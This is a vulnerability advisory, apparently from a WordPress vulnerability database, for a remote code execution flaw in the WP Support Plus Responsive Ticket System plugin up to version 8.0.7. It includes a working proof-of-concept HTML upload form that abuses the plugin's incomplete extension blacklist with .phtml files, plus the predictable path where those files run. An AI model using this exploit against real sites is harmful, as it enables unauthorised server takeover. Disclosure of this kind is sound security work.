WP Support Plus Responsive Ticket System <= 8.0.7 - Remote Code Execution



Description
WP Support Plus Responsive Ticket System <= 8.0.7 allows anyone to upload PHP files with extensions like ".phtml", ".php4", ".php5", and so on, all of which are run as if their extension was ".php" on most hosting platforms.

This is because "includes/admin/attachment/uploadAttachment.php" contains this code:

    switch ($extension){
        case 'exe':
        case 'php':
        case 'js':
            $isError=true;
            $errorMessege=__('Error: file format not supported!','wp-support-plus-responsive-ticket-system');

But it does not check for other extensions like ".phtml". In addition, it saves the file with a predictable name based on the timestamp, and anyone can load the file and run the code it contains.

Plugin author notified 2017-11-09.
Proof of Concept
<form method="post" enctype="multipart/form-data" action="https://example.com/wp-admin/admin-ajax.php">
    <input type="hidden" name="action" value="wpsp_upload_attachment">
    Choose a file ending with .phtml:
    <input type="file" name="0">
    <input type="submit" value="Submit">
</form>

After doing this, an uploaded file can be accessed at, say:

http://example.com/wp-content/uploads/wpsp/1510248571_filename.phtml

Classification

Type PRIVESC
OWASP Top 10 A2: Broken Authentication and Session Management
CWE CWE-269

Miscellaneous

Submitter Robert Mathews
Submitter Website https://tigertech.net/
Submitter Twitter @TigerTech
Views 135
Verified No
WPVDB ID 8948

Timeline

Publicly Published 2017-11-12 (almost 2 years ago)
Added 2017-11-12 (almost 2 years ago)
Last Updated 2017-11-12 (almost 2 years ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin